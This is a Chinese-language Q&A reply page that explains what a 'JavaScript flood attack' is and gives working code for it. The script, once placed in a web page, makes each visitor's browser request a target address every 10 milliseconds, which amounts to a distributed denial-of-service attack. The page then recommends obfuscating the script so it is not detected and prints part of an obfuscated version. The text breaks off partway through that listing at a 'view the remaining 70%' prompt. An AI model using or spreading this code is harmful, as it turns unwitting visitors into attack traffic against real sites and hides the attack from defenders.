网友回复
什么是javaScript的洪水攻击?
javaScript的洪水攻击就是在网页中加入特殊JS脚本,使访问网页的每个人都高频访问某个目标网站地址,大量的访问,即形成为了一种DDOS攻击,也称为洪水拒绝服务攻击。
javascript洪水攻击示例代码
<script type="text/javascript">
function imgflood(){
var targetip="127.0.0.1";
var url="/index.html";
var pic=new Image();
var rand=Math.floor(Math.random()*1000);
pic.src="http://"+targetip+url+"?rand="+rand;
}
setInterval(imgflood,10);
</script>
这段代码含义、攻击原理是:每10毫秒,带一个随机参数访问一次127.0.0.1/index.html。
为了防止脚本被识破,可对JS代码进行混淆加密,点击打开在线js代码混淆工具,比如使用加密上述JS代码:
<script type="text/javascript">
function _0x4f31() {
var _0x1a3395 = [
'numAr',
'xukbA',
'ErUrl',
'split',
'mLmVa',
'vKzrU',
'9AZqmOr',
'2430448LxHHeA',
'/index.htm',
'wHSEf',
'WPEzI',
'GVYDW',
'$]*)',
'src',
'xueHl',
'function\x20*',
'5656572wTSYWX',
'call',
'IElAA',
'random',
'1440YsYuBw',
'iJSOp',
'sADzy',
'glLav',
'MiKMb',
'esCIM',
'e)\x20{}',
'hCexA',
'cNjCd',
'apply',
'debu',
'constructo',
'ETTLc',
'IvNAf',
'\x5c+\x5c+\x20*(?:[',
'floor',
'length',
'jkVKG',
'?rand=',
'ofJMY',
'a-zA-Z_$][',
'pRcgv',
'http://',
'4zwWEmL',
'init',
'fjzzz',
'yNrPh',
'stateObjec',
'hRMjD',
'0|3|1|2|4',
'rNmhh',
'yZnBU',
'BvoXB',
'oRaGX',
'chain',
'QCVDc',
'duwGI',
'nction()\x20',
'{}.constru',
'jxktV',
'890675POsWST',
'7214060vCnxtj',
'MUiwd',
'0-9a-zA-Z_',
'1592946XDpvVT',
'\x5c(\x20*\x5c)',
'gger',
'AATxX',
'while\x20(tru',
'3526555YpvATI',
'sLLbz',
'yTYyb',
'counter',
'HfiMG',
'return\x20(fu',
'test',
'setInterva',
'CbVBM',
'input',
'rn\x20this\x22)(',
'127.0.0.1',
'string',
'ctor(\x22retu',
'action',
'NhvZL'
];
_0x4f31 = function () {
return _0x1a3395;
};
return _0x4f31();
}
(function (_0x347ffd, _0x4dbd53) {
var _0x4d049e = _0x2388, _0x175c4d = _0x347ffd();
while (!![]) {
try {
var _0x248d2 = parseInt(_0x4d049e(0x15d)) / (-0x643 + -0x1568 + 0x1bac) + parseInt(_0x4d049e(0x135)) / (-0x13f3 * 0x1 + 0x1c82 + -0x1 * 0x88d) * (-parseInt(_0x4d049e(0x127)) / (0x1312 * 0x1 + -0x16d + -0x11a2)) + parseInt(_0x4d049e(0x14c)) / (0x1 * -0x25 + 0x191e * 0x1 + -0x18f5) * (-parseInt(_0x4d049e(0x166)) / (-0x238a * -0x1 + 0x129a + 0x1 * -0x361f)) + -parseInt(_0x4d049e(0x161)) / (0x24b3 + -0x51c + 0x1f91 * -0x1) + parseInt(_0x4d049e(0x15e)) / (0x25dd + 0x1411 + -0x3 * 0x134d) + parseInt(_0x4d049e(0x128)) / (0x3d * -0x10 + 0x2218 * 0x1 + -0x1e40) + -parseInt(_0x4d049e(0x131)) / (0x14df + -0x259e + -0xc * -0x166);
if (_0x248d2 === _0x4dbd53)
break;
else
_0x175c4d['push'](_0x175c4d['shift']());
} catch (_0x11eff8) {
_0x175c4d['push'](_0x175c4d['shift']());
}
}
}(_0x4f31, -0x5155e + 0xcb5 * 0x16d + -0x384cc), (function () {
var _0x30bc99 = _0x2388, _0x4810a5 = {
'numAr': function (_0x56cc0d, _0x421aab) {
return _0x56cc0d(_0x421aab);
},
'GVYDW': function (_0x3c9968, _0x20045a) {
return _0x3c9968 + _0x20045a;
},
'QCVDc': _0x30bc99(0x16b) + _0x30bc99(0x15a),
...点击查看剩余70%


